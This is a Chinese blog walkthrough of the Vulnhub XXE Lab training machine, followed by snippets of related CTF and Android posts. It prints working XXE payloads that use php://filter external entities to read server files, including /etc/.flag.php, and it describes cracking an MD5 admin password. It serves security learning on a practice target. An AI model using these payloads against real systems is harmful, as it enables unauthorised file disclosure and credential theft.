vulhub xxe靶机通关教程

已于 2024-08-29 18:11:51 修改
阅读量207 收藏 3
点赞数 5
文章标签: android java 开发语言
于 2024-08-29 18:11:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nai_zui_jiang/article/details/141683621
版权

首先我们进行端口扫描

扫出来端口之后去尝试得出地址为183

发现robots.txt文件

由此我们就得到了两个目录

我们先进入xxe目录,并开始登录抓包

并进入重放器在xml里面构造语句

<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>

把那些码复制下来进行base64解码

解码完成后放下翻发现有用户名和密码,用户名为administhebest,但是密码是被md5加密的

那么我们把密码复制下来去md5解密,得出密码admin@123

然后我们去尝试登录

看到一个flag我们点击查看

进入xee目录进行抓包并读取文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>

又得到一段编码复制下来进行base64解码

然后再对括号里的进行base32解码

发现还得进行base64解码把base32解码完成之后的复制进行64解码

得到了flag的目录那么我们再次进入到xee目录的界面进行抓包读取

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>

我们再次进行base64解码

解码之后得出一段php代码

我们打开小皮面板进入自己网站的根目录,创建一个php文件进行访问

把刚刚解码的php代码复制进去,并加上<?php 的开头

保存然后进行访问

这里报错找不到页面肯能是php版本的问题,我们进入小皮->网站->管理->php版本,更换一个版本

这里我改成5.3.29了

下载成功后再进入php版本进行切换

换了之后看到报错内容里面有flag在花括号里

嘤嘤奶嘴酱
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub靶机通关XXE LAB: 1
yang1234567898的博客
01-16 2775
靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip 信息收集: 主机IP:192.168.43.48 开放了80端口 目录扫描:发现robots.txt 查看robots.txt,发现admin.php,还有一个xxe目录 直接访问admin.php报404,应该是不在根目录 扫描192.168.43.48/xxe目录,发现admin.php 访问xxe,是一个登录页面,应该就是admin.php 尝试弱口令和注入无果...
XXE靶机详解
like_niustyle的博客
09-14 639
常规思路:先扫描端口,扫描目录 这里有点迷惑了,我用nessus扫了一遍扫出来两个开放端口:80和5335,。但是用nmap只扫描出来了一个80 端口 不知道是什么原因,有懂的大佬可以解释一下 不管了,根据后面的结果来看端口多一个少一个完全不影响 照例访问80: 没啥用,apache默认页面 端口5335访问不了 接下来扫目录,御剑和dirb都可以,看用什么系统了 index.html依然是apache的默认界面 robots.txt: xxe是目录,admin.php是页面 xxe: xx
靶机通关 | vulhub-XXE靶机通关秘籍~
鱼溯的博客
09-20 581
vulhub-XXE靶机通关秘籍~
[渗透测试学习靶机06] vulnhub 靶场 XXE Lab 1
weixin_47112073的博客
10-23 688
网上看到了好多xxe靶机通关的文章,但是没人写为什么可以实现文件读取,为什么是XXE漏洞,我在这里简单写一下,一来方便自己以后看,二来对还没有接触过xxe漏洞的朋友来说也比较友好
网络安全靶场推荐,让你通过实操能快速提升实战技能!
2401_85773496的博客
08-19 861
自学网络安全知识,具备一定的理论基础,缺乏实战经验,想去网络靶场体验一下,通过实操能快速提升实战技能!
XXE靶机夺取Flag复现
a1245678899的博客
10-15 618
1.首先用netdiscover对kali同一网段的进行探测。15.将其编入文档进行后进行访问得到flag.5.对这两个目录进行访问发现了两个登录页面。6.使用burpsuit对其进行抓包处理。14.对其进行base64解码发现。12.对其进行解码发现新的路径。13.进行重发以后的到新的代码。4.发现了两个禁止访问的目录。
渗透:vulnhub-XXE 靶机
m0_46412682的博客
09-13 1200
渗透:vulnhub-XXE 靶机 一、靶机下载 靶机XXE 下载地址: https://download.vulnhub.com/xxe/XXE.zip 二、装靶机 ①把下载好的压缩包解压到我自己的D盘:F:\虚拟机数据\XXE ②右键双击xxe.ovf-->打开方式-->VMware,存储在自己喜欢的位置 导入后,打开虚拟机 就这样,然后设置nat模式 我们这里的VM...
一道关于php文件包含的CTF题
m0_62903168的博客
08-27 1563
这是index.php的页面。点击login后会发现url里多了action的参数,那么我们就可以通过它来获取源码。?再通过base64的解码可以查看源码。
Android 应用中广播权限未指定风险与解决方案
weixin_37600397的博客
08-23 1537
Android应用中,广播(Broadcast)是一种重要的通信机制,应用可以通过广播与系统或其他应用进行通信。然而,如果在发送广播时未指定接收者的权限,可能会导致应用暴露于安全风险之下。未授权的接收者可能会拦截这些广播,甚至可能执行恶意操作。 在安全检查中,发现了一个问题:应用存在“Receiver权限未指定风险”。这个问题主要涉及广播发送时未指定接收者权限,可能导致广播被未授权的应用接收,进而可能造成数据泄露或其他安全问题。
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 997
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
Android中apk安装过程源码解析
k663514387的博客
08-25 1455
android apk安装流程源码解析
android交叉编译报错no input files的解决方法
最新发布
louObaichu的专栏
08-28 162
安装NDK后,make报错"clang-18: error: no input files",即使直接使用clang命令(例如clang -c test.c)仍然报错。
Android 关于设备定屏/黑屏/冻屏/ANR那些事
sinat_37429535的博客
08-23 1036
再去上报至WMS进行窗口状态的切换,避免主Surface绘制完成上报至WMS后、同时SurfaceView迟迟没有绘制完成使得startingWindow过早移除从而产生黑屏的现象.主要作用为提供ViewRootImpl与SurfaceView(假如窗口存在SurfaceView的情况下)同步服务,实现在主Surface与SurfaceView均完成绘制时,现象分析:桌面的状态时黑屏的,但是SystemUI的statusBar是显示和功能都是正常的,那一般就是当前app的问题了.
[Android常见View的用法] RecyleView基本用法
studyForMokey的博客
08-25 703
RecycleView基本写法
安卓中 onClick(View v) 方法在主线程还是子线程运行
qq_33386162的博客
08-23 396
方法内执行了耗时的操作(如网络请求、大量数据处理等),这可能会导致主线程阻塞,进而影响用户体验(如界面卡顿、无响应等)。为了避免这种情况,你应该将这些耗时的操作放在子线程中执行,然后通过Handler或其他机制将结果传回主线程来更新UI。这个方法是在用户与界面元素(如按钮)进行交互时,由系统框架自动调用的。由于Android的UI操作必须是线程安全的,并且只能在主线程上进行,因此任何与UI相关的回调(包括。方法模拟了一个耗时的操作,我们通过在子线程中调用它来避免阻塞主线程。来处理跨线程的消息传递,因为。
Android 消息机制Handler完全解析(一)
dmk877的专栏
08-25 1007
Handler是Android消息机制的上层接口,这使得在开发过程中只需要和Handler交互即可。Handler的使用过程很简单,通过它可以轻松地将一个任务切换到Handler所在的线程去执行。很多人认为Handler的作用是更新UI,这的确没错,但是更新UI仅仅是Handler的一个特殊使用场景。
文件包含漏洞案例
m0_62903168的博客
08-26 466
根据源代码来看,filter、zip、phar、data等伪协议都被过滤了。但php://input这个伪协议没有被过滤,我们可以在这里做文章。先用dir看看目录,发现有flag,然后直接读取出来就行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值